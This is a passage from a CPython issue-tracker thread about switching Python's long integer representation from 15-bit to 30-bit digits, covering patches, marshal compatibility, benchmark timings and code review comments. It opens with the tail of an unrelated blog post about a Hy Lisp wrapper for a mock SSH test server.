{"en" password-prompting-command "enable" password-prompting-command}) (apply mock-ssh [] {"users" users "commands" commands "host" "127.0.0.1" "port" 2222 "prompt" "hostname>" "keypath" "."}) Granted, most changes where done in the Python module, but they were motivated by wanting to improve the readability of the Lisp using it. This is what the Python equivalent now looks like: import MockSSH users = {'testuser': '1234'} def en_change_protocol_prompt(instance): instance.protocol.prompt = "hostname #" instance.protocol.password_input = False def en_write_password_to_transport(instance): instance.writeln("MockSSH: password is %s" % instance.valid_password) command_en = MockSSH.PasswordPromptingCommand( password='1234', password_prompt="Password: ", success_callbacks=[en_change_protocol_prompt], failure_callbacks=[en_write_password_to_transport]) commands = { 'en': command_en, 'enable': command_en, } MockSSH.runServer(commands, prompt="hostname>", interface='127.0.0.1', port=2222, **users) Many things in this language makes me feel like I'm learning to program all over again and I still haven't grasped many concepts of using a lisp but it's been very insightful to rethink the way I'm thinking when designing programs and sometimes even simple loops sometimes. That said, my goal in using Hy was ultimately to make using the MockSSH module not require writing subclasses with programming logic in them in order to provide command emulation via its ssh server, and here's the final result: (import MockSSH) (require mockssh.language) (mock-ssh :users {"testuser" "1234"} :host "127.0.0.1" :port 2222 :prompt "hostname>" :commands [ (command :name "en" :type "prompt" :output "Password: " :required-input "1234" :on-success ["prompt" "hostname#"] :on-failure ["write" "MockSSH: Password is 1234"])]) $ hy mock.hy Listening on 127.0.0.1 port 2222... $ ssh testuser@0 -p 2222 testuser@0's password: hostname>en Password: Pass is 1234... hostname>en Password: hostname# You can find all the code behind this tiny DSL on github. If you want to learn more about how Hy is implemented and runs in python, watch the recorded talk. Thanks to Paul Tagliamonte for presenting at Pycon 2014!
http://un.portemanteau.ca/learn-a-lisp-with-python.html
CC-MAIN-2016-50
refinedweb
856
51.55
How to pause the main script when handling an event using observeInBackground I've been attempting to stop the script while handling my events when using observeInBackgr I wanted to know if you could provide any advice for a work around? You mentioned (in the linked answer) using a global variable, but if I'm expecting to be able to preform several finds in that period and an unexpected popup appears, would there be a "clever" or more efficient way of protecting the script? Would using try statements with a check in the except be practical (they'd have to wrap almost everything if it was a random popup, no?) or testing for the global variable before clicks? Question information - Language: - English Edit question - Status: - Answered - For: - Sikuli Edit question - Assignee: - No assignee Edit question - Last query: - 2017-12-06 - Last reply: - 2017-12-06 These solutions sound perfect, I see why you prefer it to be asked as it's own question rather than as a comment thread. I unfortunately can't test them right now, however will test both and see how they work, but from first looks it would seem like Solution 1 would work fine but solution 2 might be the more robust. Also thank you for the information on the findfailed exception handling! no problem. take your time. -- solution 1: define at the beginning of main script: shouldWait = False Make a function like: wait(imageOrPat tern, waittime) def myFind(region, imageOrPattern, waittime = 3): while shouldWait: wait(1) return region. ... and use it instead of the find operations, that needs to be guarded. instead of click(someImage) use SCREEN, someImage)) click(myFind( ... and in the observe handler at the beginning: global shouldWait shouldWait = True # do your handling shouldWait = False This is a basic solution, that might help in many cases. The risk is, that the handler event is triggered, but the handler not yet started and a find op has already begun. -- solution 2: ound. sikulix- 2014.readthedoc s.io/en/ latest/ region. html#exception- findfailed Intercept the FindFailed situations, that are caused by the GUI event (e.g. popup hiding the target image), that should be handled by observeInBackgr Since version 1.1.1 we have a callback feature for FindFailed situations: http:// Similar to solution 1 you have to define and handle global variables for communication between the FindFailed handler and the observe handler. The principal workflow: - in FindFaild handler check, wether an observe event is or was handled - if yes, wait for the completion of the observe handling and return with the REPEAT advice - if no, then you have a normal FindFailed that should be handled as needed This solution is a bit more complex, but has a chance, to get around all such conflict situations.
https://answers.launchpad.net/sikuli/+question/661427
CC-MAIN-2017-51
refinedweb
463
56.29
I recently removed the Emmet package however I can still do things like p.hello and when TAB is pressed it expands it how Emmet would and same for IDs. But I can't do other things in Emmet which is expected but I'm just wondering if it was removed properly (I removed it via Package Control). p.hello Also, why does p.hello come up in the autocompletion buffer when I'm typing it? I'd like to get rid of this. I wasn't sure if this belonged in the forum or Emmet's Github issues because I don't know if it's because of Emmet or Package Control or something else I'm unaware of. Thanks in advance. This is something that the default HTML package does for you by default; it can expand tag.class or tag#id into a complete tag for you. It's not as sophisticated as what you can pull off with an emmet abbreviation, though quite handy regardless. tag.class tag#id I would say that the package is quite likely gone, as the behaviour you're seeing is expected (and in fact is what I see and I have never installed Emmet). If you want to be absolutely certain, you can select Sublime Text > Preferences > Browse Packages... from the menu to open a Finder window on the packages directory, and then go up one folder. There you will find a folder named Installed Packages, and you can check inside that folder for an Emmet.sublime-package file. Sublime Text > Preferences > Browse Packages... Installed Packages Emmet.sublime-package For completeness I'll also mention that some packages can be installed "unpacked" (or be unpacked by you), in which case they will appear as a folder inside of the Packages directory that you get to from the menu entry above. However most packages that Package Control installs are installed as sublime-package files. Packages sublime-package That I'm not sure of off the top of my head. I don't see that happening in my simple tests here. I know that the completions buffer picks up text from inside of the buffer and can offer it as a completion, but that doesn't look like what is happening to you there, though. Hey thanks for getting an answer back so quickly. I've got a python file which disables words from being picked up from the buffer with the following contents: import sublime import sublime_plugin class DisableCompletionListener(sublime_plugin.EventListener): def on_query_completions(self, view, prefix, locations): return ([], sublime.INHIBIT_WORD_COMPLETIONS) Do you think that has anything to do with it? It simply removes any words in the current file from appearing in the buffer. It just bugs me when words come up simply because they're in the file (this way, only snippets I create will show up). Hmm, I may have forgotten to mention I'm using ST3 although the issue I'm getting seems to be unique to my setup. I'll try to find out what's wrong. Interesting; including that doesn't make this happen for me. In fact I can't get the auto-completion dialog to appear on the screen at either way in this situation; it doesn't pop up automatically and attempting to trigger it manually automatically executes the completion. Looking again at the image that you provided, it looks like the popup is syntax highlighted somewhat there. I'm not aware of any way that you could syntax highlight the auto-completion list (although I by no means an expert) but that makes me suspicious that you may have some other plugin that's showing you a popup in that situation, and pressing tab while it is there just happens to insert the best autocompletion. Does the same thing happen with the text p.h? In my case the autocomplete popup will appear because it's ambiguous whether I mean to insert <p class="h"></p> or invoke the html snippet. p.h <p class="h"></p> html Yes, the popup appears for me also since I have other snippets beginning with h as well. I'm checking for any foreign plugin I may not be aware of. I looked into html_completions.py in the html package folder, and I saw that there is a function def expand_tag_attributes. I'm not sure if this is the source of the autocompletion problem but that's how the expansion is working but I can't seem to make it out. Also I can't find any packages causing this. I just thought of something. Would it be possible to clone the tag abbreviation within a custom completion? Meaning for any valid tag, expand it with a class attribute if there's a dot or an id attribute if there's a #. h html_completions.py def expand_tag_attributes class id Yep, basically that is using a regex to see if there is something that looks like something.other or something#other, and if there is it expands it out to a complete tag of something with an attribute value of other, where the attribute is either class or id depending on which way you type it. something.other something#other something other That's definitely the source of the completion if not the source of the problem (are all of your autocomplete suggestions syntax highlighted?)/ As defined, the completions code for HTML will expand a class or ID as seen here, and by default it will also autocomplete attributes from within a tag (including having inherent knowledge of what attributes a tag can have), so something like the following is possible already: That said this requires you to expand the attribute first. I don't see any reason why you couldn't have a completion that examines the tag that it is inside of and which offers the appropriate attribute as the candidate, though it would have to parse the current tag to see what attributes it already has first. That's what I'm thinking of doing. And yes, as I type the syntax which matches any autocompletion suggestions they are highlighted. Would I be able to parse within a .sublime-completion file or would I have to take this to a .py file? I don't have much experience with either just throwing suggestions that may work.EDIT: I figured out the problem. I had the auto_complete_selector setting set to true though I'm not entirely sure what to set the value to since false doesn't do anything. I guess what I want to do is set the scope for autocompletion to only snippets. Is that possible? .sublime-completion .py auto_complete_selector true false Completions injected via sublime-completions files are sort of a different take on snippets (I wrote a thing about that a few days ago here that might be useful). sublime-completions I think you have to go the plugin route on this one due to wanting the expansion to happen after you've already entered .something; as far as I'm aware short of selecting text before you trigger a snippet/completion there is no way to convey the text preceding the match and use it in the completion itself (I may be wrong). .something Conceivably you could come up with a couple of key bindings on Tab that had a context that makes sure you're invoking it from inside of an HTML tag, with text selected, and using a pre and post regex that would be able to distinguish between a tag having an id or class attribute and then invoke the command to insert one of two snippets that does what you want. That would require entering the text first and selecting it though. That is probably not saving much time over just using the existing completion on the attribute, though. I've never tried such a thing (I heard that parsing HTML via regex is impossible despite the fact that this is exactly how the sublime syntax is doing it) so I'm not sure how tricky it might be to dial all of those in. Ahh interesting. The default value for that is (from the default Preferences.sublime-settings): Preferences.sublime-settings // Controls what scopes auto complete will be triggered in "auto_complete_selector": "meta.tag - punctuation.definition.tag.begin, source - comment - string.quoted.double.block - string.quoted.single.block - string.unquoted.heredoc", Basically it's a big scope selector that tries to narrow in exactly on where an autocompletion should be allowed to be triggered in. I'm not sure that I knew that you could set that to a boolean value, but it sounds like perhaps it is interpreted as "trigger everywhere" when set to true or something? The scopes that you can restrict by are based on the syntax of the file that you're editing, not for how they're being applied. I think the only thing you can successfully mask from the completion buffer is words sourced from the current file you're editing (which you're already doing), short of deleting all sublime-completions files entirely and editing plugins to remove their on_query_completions handlers. on_query_completions
https://forum.sublimetext.com/t/removal-of-emmet/26188
CC-MAIN-2018-09
refinedweb
1,534
60.14
Created on 2008-11-04 10:45 by mark.dickinson, last changed 2009-03-20 16:08 by mark.dickinson. This issue is now closed. Here: ) Note that to avoid "bad marshal data" errors, you'll probably need to do a 'make distclean' before rebuilding with this patch. Here's an updated patch, with the following changes from the original: - make the size of a digit (both the conceptual size in bits and actual size in bytes) available to Python via a new structseq sys.int_info. This information is useful for the sys.getsizeof tests. - fix a missing cast in long_hash - better fast path for 1-by-1 multiplication that doesn't go via PyLong_FromLongLong. > Note that to avoid "bad marshal data" errors, > you'll probably need to do a 'make distclean' > before rebuilding with this patch.). If we change the marshal format of long, the magic number should be different (we might use a tag like the "full unicode" tag used in Python3 magic number) and/or the bytecode (actual bytecode is 'l'). The base should be independent of the implementation, like Python does with text: UTF-8 for files and UCS-4 in memory. We may use the base 2^8 (256) or another power or 2^8 (2^16, 2^32, 2^64?). The base 256 sounds interresting because any CPU is able to process 8 bits digits. Cons: Use a different bases makes Python slower for loading/writing from/to .pyc. oh yay, thanks. it looks like you did approximately what i had started working on testing a while back but have gone much further and added autoconf magic to try and determine when which size should be used. good. (i haven't reviewed your autoconf stuff yet) As for marhsalled data and pyc compatibility, yes that is important to consider. We should probably base the decision on which digit size to use internally on benchmarks, not just if the platform can support 64bit ints. Many archs support 64bit numbers as a native C type but require multiple instructions or are very slow when doing it. (embedded arm, mips or ppc come to mind as obvious things to test that on) >. [Victor Stinner] >).. > > And why 30 bits and not 31 bits, or 63 bits, or 120 bits? > > Mostly laziness (...) It was an argument for changing the base used by the mashal :-) > 31 bits would involve rewriting the powering algorithm, which assumes that > PyLong_SHIFT is divisible by 5 Powering is an simple algorithm. If it was the division, it would be much harder :-) Python stores the sign of the number in the first digit. Because of that, we are limited to 15/30 bits. Storing the sign in the size (which size? no idea yet) would allows to use a bigger base (31 bits? 63 bits?). > wrote an example to detect overflows in C on the mailing list. Copy of my ------------------------------- 8< ---------------------- About ;-) ------------------------------- 8< ---------------------- > I guess my feeling is simply that the 15-bit to 30-bit change seems > incredibly easy and cheap: very little code change, and hence low risk of > accidental breakage. Python has an amazing regression test suite! I used it to fix my GMP patch. We can experiment new bases using this suite. Anyway, i love the idea of using 30 bits instead of 15! Most computer are now 32 or 64 bits! But it's safe to keep the 15 bits version to support older computers or buggy compilers. I started to work with GIT. You may be interrested to work together on GIT. It's much easier to exchanges changeset and play with branches. I will try to publish my GIT tree somewhere. Following Victor's suggestion, here's an updated patch; same as before, except that marshal now uses base 2**15 for reading and writing, independently of whether PyLong_SHIFT is 15 or 30. Mark: would it be possible to keep the "2 digits" hack in PyLong_FromLong, especially with base 2^15? Eg. "#if PyLong_SHIFT == 15". The base 2^15 slow, so don't make it slower :-) - /* 2 digits */ - if (!(ival >> 2*PyLong_SHIFT)) { - v = _PyLong_New(2); - if (v) { - Py_SIZE(v) = 2*sign; - v->ob_digit[0] = (digit)ival & PyLong_MASK; - v->ob_digit[1] = ival >> PyLong_SHIFT; - } - return (PyObject*)v; - } > marshal now uses base 2**15 for reading and writing Yes, it uses base 2**15 but it's not the correct conversion to base 2**15. You convert each PyLong digit to base 2**15 but not the whole number. As a result, the format is different than the current mashal version. PyLong_FromLong() doesn't go into the 1 digit special case for negative number. You should use: /* Fast path for single-digits ints */ if (!(abs_ival>>PyLong_SHIFT)) { v = _PyLong_New(1); if (v) { Py_SIZE(v) = sign; v->ob_digit[0] = abs_ival; } return (PyObject*)v; } > Yes, it uses base 2**15 but it's not the correct conversion to base > 2**15. You convert each PyLong digit to base 2**15 but not the whole > number. I don't understand: yes, each base 2**30 digit is converted to a pair of base 2**15 digits, and if necessary (i.e., if the top 15 bits of the most significant base 2**30 digit are zero) the size is adjusted. How is this not converting the whole number? > As a result, the format is different than the current mashal version. Can you give an example of an integer n such that marshal.dumps(n) gives you different results with and without the patch? As far as I can tell, I'm getting the same marshal results both with the unpatched version and with the patch applied. Other... Here's a pybench comparison, on OS X 10.5/Core 2 Duo/gcc 4.0.1 (32-bit non-debug build of the py3k branch). I got this by doing: [create clean build of py3k branch] dickinsm$ ./python.exe Tools/pybench/pybench.py -f bench_unpatched [apply 30bit patch and rebuild] dickinsm$ ./python.exe Tools/pybench/pybench.py -c bench_unpatched Highlights: SimpleLongArithmetic: around 10% faster. SimpleComplexArithmetic: around 16% slower! CompareFloatsIntegers: around 20% slower. I'll investigate the slowdowns. > I wrote a patch to compute stat about PyLong function calls. make (use setup.py): PyLong_FromLong: 168572 calls, min=( 0, ), avg=(1.4, ), max=( 3, ) long_bool: 48682 calls, min=( 0, ), avg=(0.2, ), max=( 2, ) long_add: 39527 calls, min=( 0, 0), avg=(0.9, 1.0), max=( 2, 3) long_compare: 39145 calls, min=( 0, 0), avg=(1.2, 1.1), max=( 3, 3) PyLong_AsLong: 33689 calls, min=( 0, ), avg=(0.9, ), max=( 45, ) long_sub: 13091 calls, min=( 0, 0), avg=(0.9, 0.8), max=( 1, 1) long_bitwise: 4636 calls, min=( 0, 0), avg=(0.8, 0.6), max=( 2, 2) long_hash: 1097 calls, min=( 0, ), avg=(0.9, ), max=( 3, ) long_mul: 221 calls, min=( 0, 0), avg=(0.8, 1.1), max=( 2, 2) long_invert: 204 calls, min=( 0, ), avg=(1.0, ), max=( 1, ) long_neg: 35 calls, min=( 1, ), avg=(1.0, ), max=( 1, ) long_format: 3 calls, min=( 0, ), avg=(0.7, ), max=( 1, ) long_mod: 3 calls, min=( 1, 1), avg=(1.0, 1.0), max=( 1, 1) long_pow: 1 calls, min=( 1, 1), avg=(1.0, 1.0), max=( 1, 1) pystone: PyLong_FromLong:1587652 calls, min=( 0, ), avg=(1.0, ), max=( 3, ) long_add: 902487 calls, min=( 0, 0), avg=(1.0, 1.0), max=( 2, 2) long_compare: 651165 calls, min=( 0, 0), avg=(1.0, 1.0), max=( 3, 3) PyLong_AsLong: 252476 calls, min=( 0, ), avg=(1.0, ), max=( 2, ) long_sub: 250032 calls, min=( 1, 0), avg=(1.0, 1.0), max=( 1, 1) long_bool: 102655 calls, min=( 0, ), avg=(0.5, ), max=( 1, ) long_mul: 100015 calls, min=( 0, 0), avg=(1.0, 1.0), max=( 1, 2) long_div: 50000 calls, min=( 1, 1), avg=(1.0, 1.0), max=( 1, 1) long_hash: 382 calls, min=( 0, ), avg=(1.1, ), max=( 2, ) long_bitwise: 117 calls, min=( 0, 0), avg=(1.0, 1.0), max=( 1, 2) long_format: 1 calls, min=( 2, ), avg=(2.0, ), max=( 2, ) min/avg/max are the integer digit count (minimum, average, maximum). What can we learn from this numbers? PyLong_FromLong(), long_add() and long_compare() are the 3 most common operations on integers. Except PyLong_FromLong(), long_compare() and long_format(), arguments of the functions are mostly in range [-2^15; 2^15]. Biggest number is a number of 45 digits: maybe just one call to long_add(). Except this number/call, the biggest numbers have between 2 and 3 digits. long_bool() is never called with number bigger than 2 digits. long_sub() is never called with number bigger than 1 digit! And now the stat of Python patched with 30bit_longdigit3.patch. min/avg/max are now the number of bits which gives better informations. "bigger" is the number of arguments which are bigger than 1 digit (not in range [-2^30; 2^30]). make ==== _FromLong: 169734 calls, min=( 0, ), avg=(11.6, ), max=( 32, ) \--> bigger=31086 long_bool: 48772 calls, min=( 0, ), avg=( 0.3, ), max=( 24, ) long_add: 39685 calls, min=( 0, 0), avg=( 6.5, 3.5), max=( 19, 32) \--> bigger=1 long_compare: 39445 calls, min=( 0, 0), avg=( 9.3, 8.4), max=( 31, 33) \--> bigger=10438 _AsLong: 33726 calls, min=( 0, ), avg=( 4.9, ), max=(1321, ) \--> bigger=10 long_sub: 13285 calls, min=( 0, 0), avg=( 7.6, 5.6), max=( 13, 13) long_bitwise: 4690 calls, min=( 0, 0), avg=( 1.7, 1.9), max=( 16, 16) long_hash: 1097 calls, min=( 0, ), avg=( 8.1, ), max=( 33, ) \--> bigger=4 long_mul: 236 calls, min=( 0, 0), avg=( 1.3, 5.4), max=( 17, 17) long_invert: 204 calls, min=( 0, ), avg=( 2.4, ), max=( 3, ) long_neg: 35 calls, min=( 1, ), avg=( 4.3, ), max=( 7, ) long_format: 3 calls, min=( 0, ), avg=( 2.0, ), max=( 4, ) long_mod: 3 calls, min=( 1, 2), avg=( 1.7, 2.0), max=( 2, 2) long_pow: 1 calls, min=( 2, 6), avg=( 2.0, 6.0), max=( 2, 6) Notes about make: - PyLong_FromLong(), long_compare(), PyLong_AsLong() and long_hash() gets integers not in [-2^30; 2^30] which means that all other functions are only called with arguments of 1 digit! - PyLong_FromLong() gets ~30.000 (18%) integers of 32 bits - global average integer size is between 0.3 and 11.6 (~6.0 bits?) - There are 41.500 (12%) big integers on ~350.000 integers pystone ======= _FromLong: 1504983 calls, min=( 0, ), avg=( 5.1, ), max=( 31, ) \--> bigger=14 long_add: 902487 calls, min=( 0, 0), avg=( 3.9, 2.4), max=( 17, 17) long_compare: 651165 calls, min=( 0, 0), avg=( 1.7, 1.4), max=( 31, 31) \--> bigger=27 _AsLong: 252477 calls, min=( 0, ), avg=( 4.6, ), max=( 16, ) long_sub: 250032 calls, min=( 1, 0), avg=( 4.0, 1.6), max=( 7, 7) long_bool: 102655 calls, min=( 0, ), avg=( 0.5, ), max=( 7, ) long_mul: 100015 calls, min=( 0, 0), avg=( 2.5, 2.0), max=( 4, 16) long_truediv: 50000 calls, min=( 4, 2), avg=( 4.0, 2.0), max=( 4, 2) long_hash: 382 calls, min=( 0, ), avg=( 8.1, ), max=( 28, ) long_bitwise: 117 calls, min=( 0, 0), avg=( 6.7, 6.6), max=( 15, 16) long_format: 1 calls, min=(16, ), avg=(16.0, ), max=( 16, ) Notes about pystone: - very very few numbers are bigger than one digit: 41 / ~4.000.000 - global average integer size is between 0.5 and 6.7 (~3.0 bits?) - the biggest number has only 31 bits (see long_compare) Short summary: - pystone doesn't use big integer (1 big integer for 100.000 integers) => don't use pystone! - the average integer size is around 3 or 6 bits, which means that most integers can be stored in 8 bits (-255..255) => we need to focus on the very small numbers => base 2^30 doesn't help for common Python code, it only helps programs using really big numbers (128 bits or more?) Here. Using 30bit_longdigit4.patch, I get this error: "Objects/longobject.c:700: erreur: "SIZE_T_MAX" undeclared (first use in this function)". You might use the type Py_ssize_t with PY_SSIZE_T_MAX. I used INT_MAX to compile the code. I like the idea of sys.int_info, but I would prefer a "base" attribute than "bits_per_digit". A base different than 2^n might be used (eg. a base like 10^n for fast conversion from/to string). Here's a version of the 15-bit to 30-bit patch that adds in a souped-up version of Mario Pernici's faster multiplication. I did some testing of 100x100 digit and 1000x1000 digit multiplies. On 32-bit x86: 100 x 100 digits : around 2.5 times faster 1000 x 1000 digits : around 3 times faster. On x86_64, I'm getting more spectacular results: 100 x 100 digits : around 5 times faster 1000 x 1000 digits: around 7 times faster! The idea of the faster multiplication is quite simple: with 30-bit digits, one can fit a sum of 16 30-bit by 30-bit products in a uint64_t. This means that the inner loop for the basecase grade-school multiplication contains one fewer addition and no mask and shift. [Victor, please don't delete the old longdigit4.patch!] Just tested the patch, here are some benchmarks: ./python -m timeit -s "a=100000000;b=777777" "a//b" -> 2.6: 0.253 usec per loop -> 3.1: 0.61 usec per loop -> 3.1 + patch: 0.331 usec per loop ./python -m timeit -s "a=100000000;b=777777" "a*b" -> 2.6: 0.431 usec per loop -> 3.1: 0.302 usec per loop -> 3.1 + patch: 0.225 usec per loop ./python -m timeit -s "a=100000000;b=777777" "a+b" -> 2.6: 0.173 usec per loop -> 3.1: 0.229 usec per loop -> 3.1 + patch: 0.217 usec per loop But it seems there are some outliers: ./python -m timeit -s "a=100000000**5+1;b=777777**3" "a//b" -> 2.6: 1.13 usec per loop -> 3.1: 1.12 usec per loop -> 3.1 + patch: 1.2 usec per loop I wrote a small benchmark tool dedicated to integer operations (+ - * / etc.): bench_int.py attached to issue4294. See also Message75715 and Message75719 for my benchmark results. Short sum up: 2^30 base helps a lot on 64 bits CPU (+26%) whereas the speedup is small (4%) on 32 bits CPU. But don't trust benchmarks :-p The most recent patch is out of date and no longer applies cleanly. I'm working on an update. Updated patch against py3k. I'm interested in getting this into the trunk as well, but py3k is more important (because *all* integers are long integers). It's also a little more complicated to do this for py3k (mostly because of all the small integer caching), so backporting to 2.7 is easier than trying to forward port a patch from 2.7 to 3.1. Notes: - I've added a configure option --enable-big-digits (there are probably better names), enabled by default. So you can use --disable-big-digits to get the old 15-bit behaviour. - I *think* this patch should work on Windows; confirmation would be appreciated. - I've removed the fast multiplication code, in the interests of keeping the patch simple. If this patch goes in, we can concentrate on speeding up multiplication afterwards. For now, note that 30-bit digits give the *potential* for significant speedups in multiplication and division (see next item). - There's a nasty 'feature' in x_divmod: the multiplication in the innermost loop is digit-by-twodigits -> twodigits, when it should be digit-by-digit -> twodigits; this probably causes significant slowdown with 30-bit digits. This may explain Antoine's outlier. Again, if this patch goes in I'll work on fixing x_divmod. - Re: Victor's comment about a 'base' attribute: I tried this, but quickly discovered that we still need the 'bits_per_digit' for tests. I think that binaryness is so ingrained that it's not really worth worrying about the possibility of the base changing from a power of 2 to a power of 10. So in the end I left base out. - It did occur to me that NSMALLPOSINTS and NSMALLNEGINTS might usefully be exposed in sys.int_info, mostly for the purposes of testing. Thoughts? Forgot to mention: you'll need to rerun autoconf and autoheader after applying the patch and before doing ./configure Antoine, were your posted results on a 64-bit or a 32-bit system? Mark, I think it was 32-bit at the time. Now with the latest patch, and under a 64-bit system (the same one actually, but with a 64-bit distro): * pybench is roughly 2% slower * timeit -s "a=100000000;b=777777" "a//b" - before: 0.563 usec per loop - after: 0.226 usec per loop * timeit -s "a=100000000;b=777777" "a*b" - before: 0.179 usec per loop - after: 0.131 usec per loop * timeit -s "a=100000000;b=777777" "a+b" - before: 0.174 usec per loop - after: 0.134 usec per loop Actually, I think my previous results were in 64-bit mode already. By the way, I don't think unconditionally using uint64_t is a good thing on 32-bit CPUs. uint64_t might be an emulated type, and operations will then be very slow. It would be better to switch based on sizeof(long) (for LP64 systems) or sizeof(void *) (for LLP64 systems). Actually, I still get a speedup on a 32-bit build. :) Here's a version of the patch that includes optimizations to basecase multiplication, and a streamlined x_divrem for faster division. With Victor's benchmark, I'm getting 43% speed increase on 64-bit Linux/Core 2 Duo. Note: the base patch is stable and ready for review; in contrast, the optimizations are still in a state of flux, so the +optimizations patch is just there as an example of what might be possible. the 64-bit type isn't really used very much: its main role is as the result type of a 32-bit by 32-bit multiplication. So it might not matter too much if it's an emulated type; what's important is that the 32-bit by 32-bit multiply with 64-bit results is done in a single CPU instruction. I don't know how to test for this. Do you know of a mainstream system where this isn't true? I'll test this tonight on 32-bit PPC and 32=bit Intel, and report back. I don't care very much about trying to *automatically* do the right thing for small or embedded systems: they can use the --disable-big-digits configure option to turn 30-bit digits off. Antoine, do you think we should be using 30-bit digits by default *only* on 64-bit machines? I guess I could go with that, if it can be manually overridden by the configure option. As I said, I actually see a speedup as well on a 32-bit build on a 64-bit CPU. So the current patch (30bit_longdigit13.patch) is fine. Some more benchmarks results (with 30bit_longdigit13.patch): * Victor's bench_int.py: - 32-bit without patch: 1370.1 ms - 32-bit with patch: 1197.8 ms (23% speedup) - 64-bit without patch: 1357.6 ms - 64-bit with patch: 981.6 ms (28% speedup) * calculating 2000 digits of pi (*): - 32-bit without patch: 2.87 s. - 32-bit with patch: 2.87 s. (0% speedup: ???) - 64-bit without patch: 3.35 s. - 64-bit with patch: 1.68 s. (50% speedup) (*) using the following script adapted for py3k: Here's the py3k version of pidigits.py. Thanks, Antoine. I've reworked the configure stuff anyway: the decision about what size digits to use should take place in pyport.h rather than Include/longintrepr.h. Updated patches will arrive shortly! Updated non-optimized patch. The only real change is that I've moved some of the configuration stuff around (so not worth re-benchmarking this one); I hope that I've now got the division of labour correct: - configure script simply parses the --enable-big-digits option and sets PYLONG_DIGIT_SIZE in pyconfig.h to 15 or 30, or leaves it undefined if that option wasn't given to configure - PC/pyconfig.h doesn't define PYLONG_DIGIT_SIZE - pyport.h chooses a suitable value for PYLONG_DIGIT_SIZE if it's not already defined - Include/longintrepr.h just follows orders: it expects PYLONG_DIGIT_SIZE to be defined already, and complains if PYLONG_DIGIT_SIZE=30 but the necessary integer types aren't available. Thanks for all the benchmarking. I'd probably better check on python-dev before pushing this in, since it's a new feature. I hope no-one wants a PEP. :-) The last patch (30bit_longdigit14.patch) is obviously missing some stuff, but other than that I think everything's fine and you could commit. Oops. Here's the correct patch. Has any conclusion been reached wrt. overhead of 30-bit multiplication on 32-bit systems? IIUC, the single-digit multiplication is equivalent to the C program unsigned long long m(unsigned long long a, unsigned long b) { return a*b; } (i.e. one digit is cast into two digits, and multiplied with the other one). gcc 4.3.3, on x86, compiles this into movl 12(%esp), %eax movl 8(%esp), %ecx imull %eax, %ecx mull 4(%esp) leal (%ecx,%edx), %edx ret In pseudo-code, this is tmp = high_a * b; high_res:low_res = low_a * b; high_res += tmp So it does use two multiply instructions (plus an add), since one argument got cast into 64 bits. VS2008 compiles it into push eax push ecx push 0 push edx call __allmu i.e. it widens both arguments to 64 bits, then calls a library routine. > unsigned long long m(unsigned long long a, unsigned long b) > { > return a*b; > } I think that's doing a 32 x 64 -> 64 multiplication; what's being used is more like this: unsigned long long m(unsigned long a, unsigned long b) { return (unsigned long long)a*b; } which gcc -O3 compiles to: pushl %ebp movl %esp, %ebp movl 12(%ebp), %eax mull 8(%ebp) leave ret Patch uploaded to Rietveld (assuming that I did it right): It looks as though Visual Studio 2008 does the 'right' thing, too, at least in some circumstances. Here's some assembler output (MSVC Express Edition, 32-bit Windows XP / Macbook Pro). ; 3 : unsigned long long mul(unsigned long x, unsigned long y) { push ebp mov ebp, esp ; 4 : return (unsigned long long)x * y; mov eax, DWORD PTR _x$[ebp] mov ecx, DWORD PTR _y$[ebp] mul ecx ; 5 : } pop ebp ret 0 > Patch uploaded to Rietveld (assuming that I did it right): > Hehe, your configure's patch is too huge for Rietveld which displays a "MemoryError" :-) Bug reported at: Ok, let's try 30bit_longdigit14.patch: patch -p0 < 30bit_longdigit14.patch autoconf && autoheader ./configure && make I'm using two computers: - marge: Pentium4, 32 bits, 3 GHz (32 bits) - lisa: Core Quad (Q9300), 64 bits, 2.5 GHz (64 bits) Both uses 32 bits digit (and 64 bits twodigits), py3k trunk and Linux. * My bench_int.py: - 32-bit without patch: 1670.7 ms - 32-bit with patch: 1547.8 ms (+7.4%) - 64-bit without patch: 885.2 ms - 64-bit with patch: 627.1 ms (+29.2%) * pidigits 2000 (I removed the calls to print): lowest result on 5 runs: - 32-bit without patch: 2991.5 ms - 32-bit with patch: 3445.4 ms (-15.2%) SLOWER! - 64-bit without patch: 1949.9 ms - 64-bit with patch: 973.0 ms (+50.1%) * pybench.py (minimum total) - 32-bit without patch: 9209 ms - 32-bit with patch: - 64-bit without patch: 4430 ms - 64-bit with patch: 4330 ms (=) pybench details: Test 32 bits (without,patch) | 64 bits (without,patch) ----------------------------------------------------------------- CompareFloatsIntegers: 293ms 325ms | 113ms 96ms CompareIntegers: 188ms 176ms | 129ms 98ms DictWithIntegerKeys: 117ms 119ms | 73ms 69ms SimpleIntFloatArithmetic: 192ms 204ms | 84ms 80ms SimpleIntegerArithmetic: 188ms 196ms | 84ms 80ms ----------------------------------------------------------------- On 64 bits, all integer related tests are faster. On 32 bits, some tests are slower. Sum up: on 64 bits, your patch is between cool (30%) and awesome (50%) :-) On 32 bits, it's not a good idea to use 32 bits digit because it's a little bit slower. => I would suggest to use 2^30 base only if sizeof(long)>=8 (64 bits CPU). Note: I already get similar result (2^30 is slower on 32 bits CPU) in older tests. New attachment: pidigits_noprint.py, hacked version of pidigits.py to remove the print and add the computation time in millisecond. Print was useless because we don't want to benchmark int->str conversion, especially when the integer is in [0; 9]. Thanks very much for the timings, Victor. Just out of interest, could you try the pydigits script with the +optimizations patch on 32-bit? As mentioned above, there's a significant (for 30-bit digits) problem with x_divrem: the inner loop does a 32 x 64-bit multiply when it should be doing a 32 x 32-bit multiply (the variable q is declared as twodigits, but always fits into a digit). This is fixed in the +optimizations patch, and pi_digits is heavy on the divisions, so I wonder whether this might make a difference. > I would suggest to use 2^30 base only if sizeof(long)>=8 (64 bits CPU). Thats not the correct test. Test for an actual 64-bit build target. sizeof(long) and sizeof(long long) are not usefully related to that in any sort of cross platform manner. On windows, we'd define the flag for 15 vs 30 bit longs in the build configs for the various build targets. On every thing else (autoconf), we can use a configure test to check the same things that platform.architecture() checks to return '32bit' vs '64bit'. Reviewers: Martin v. Löwis, File Doc/library/sys.rst (right): Line 418: A struct sequence that holds information about Python's Agreed. All that's important here is the attribute access. File Include/longintrepr.h (right): Line 24: Furthermore, NSMALLNEGINTS and NSMALLPOSINTS should fit in a digit. */ On 2009/02/17 22:39:18, Martin v. Löwis wrote: > Merge the comments into a single on. There is no need to preserve the evolution > of the code in the comment structure. Done, along with a general rewrite of this set of comments. File Objects/longobject.c (right): Line 2872: /* XXX benchmark this! Is is worth keeping? */ On 2009/02/17 22:39:18, Martin v. Löwis wrote: > Why not PyLong_FromLongLong if available (no special case if not)? Yes, 